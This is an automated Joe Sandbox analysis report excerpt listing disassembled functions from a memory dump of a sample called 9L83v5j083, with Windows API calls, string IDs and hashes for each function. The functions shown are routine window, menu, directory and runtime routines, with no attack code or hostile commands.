                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 2353593579-4108050209
                                                                                                                  • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                                                  • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                                                                                  • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                                                  • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                                                                                  APIs
                                                                                                                  • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                                                                  • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                                                                  • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                                                                  • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                                                                  • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                                                                  • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                                                                  • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                                                                  • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                                                                  • GetSysColor.USER32(00000008), ref: 0044A265
                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                                                                  • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1744303182-0
                                                                                                                  • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                                  • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                                                                  • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                                  • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                                                                  • __mtterm.LIBCMT ref: 00417C34
                                                                                                                    • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                                                                    • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                                                                    • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                                                                    • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                                                                  • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                                                                  • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                                                                  • __init_pointers.LIBCMT ref: 00417CE6
                                                                                                                  • __calloc_crt.LIBCMT ref: 00417D54
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                  • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                  • API String ID: 4163708885-3819984048
                                                                                                                  • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                                  • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                                                                  • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                                  • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __wcsicoll$IconLoad
                                                                                                                  • String ID: blank$info$question$stop$warning
                                                                                                                  • API String ID: 2485277191-404129466
                                                                                                                  • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                                  • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                                                                                  • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                                  • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                                                                  APIs
                                                                                                                  • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                                                                  • GetDesktopWindow.USER32 ref: 0045476F
                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00454776
                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                                                                  • GetClientRect.USER32(?,?), ref: 004547D2
                                                                                                                  • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                                                                  • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3869813825-0
                                                                                                                  • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                                  • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                                                                                  • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                                  • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                                                                                  APIs
                                                                                                                  • _wcslen.LIBCMT ref: 00464B28
                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                                                                  • _wcslen.LIBCMT ref: 00464C28
                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                                                                  • _wcslen.LIBCMT ref: 00464CBA
                                                                                                                  • _wcslen.LIBCMT ref: 00464CD0
                                                                                                                  • _wcslen.LIBCMT ref: 00464CEF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen$Directory$CurrentSystem
                                                                                                                  • String ID: D
                                                                                                                  • API String ID: 1914653954-2746444292
                                                                                                                  • Opcode ID: b4d9310e4df73a5f844644384c3f1e2c678117f64a9ceec9798a15f0ed4cdbc5
                                                                                                                  • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                                                                                  • Opcode Fuzzy Hash: b4d9310e4df73a5f844644384c3f1e2c678117f64a9ceec9798a15f0ed4cdbc5
                                                                                                                  • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                                                                                  APIs
                                                                                                                  • _wcsncpy.LIBCMT ref: 0045CE39
                                                                                                                  • __wsplitpath.LIBCMT ref: 0045CE78
                                                                                                                  • _wcscat.LIBCMT ref: 0045CE8B
                                                                                                                  • _wcscat.LIBCMT ref: 0045CE9E
                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                                                                                    • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                  • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                                                                                  • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                                                                                  • _wcscpy.LIBCMT ref: 0045CF61
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                                                                  • String ID: *.*
                                                                                                                  • API String ID: 1153243558-438819550
                                                                                                                  • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                                                                  • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                                                                                  • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                                                                  • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __wcsicoll
                                                                                                                  • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                                                                  • API String ID: 3832890014-4202584635
                                                                                                                  • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                                                  • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                                                                                  • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                                                  • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                                                                                  APIs
                                                                                                                  • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                                                                  • GetFocus.USER32 ref: 0046A0DD
                                                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessagePost$CtrlFocus
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 1534620443-4108050209
                                                                                                                  • Opcode ID: dc33c7fbc484300c667a62bc0e3eacd913b6ce451598370542263f9935bb9fd8
                                                                                                                  • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                                                                  • Opcode Fuzzy Hash: dc33c7fbc484300c667a62bc0e3eacd913b6ce451598370542263f9935bb9fd8
                                                                                                                  • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                                                                  APIs
                                                                                                                  • DestroyWindow.USER32(?), ref: 004558E3
                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$CreateDestroy
                                                                                                                  • String ID: ,$tooltips_class32
                                                                                                                  • API String ID: 1109047481-3856767331
                                                                                                                  • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                                  • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                                                                  • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                                  • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                                                                  APIs
                                                                                                                  • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                                                                  • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                                                                  • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                                                                  • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                                                                  • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                                                                  • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                                                                  • GetMenuItemCount.USER32 ref: 00468CFD
                                                                                                                  • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                                                                  • GetCursorPos.USER32(?), ref: 00468D3F
                                                                                                                  • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                                                                  • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 1441871840-4108050209
                                                                                                                  • Opcode ID: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                                                                                                  • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                                                                                  • Opcode Fuzzy Hash: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                                                                                                  • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                                  • __swprintf.LIBCMT ref: 00460915
                                                                                                                  • __swprintf.LIBCMT ref: 0046092D
                                                                                                                  • _wprintf.LIBCMT ref: 004609E1
                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
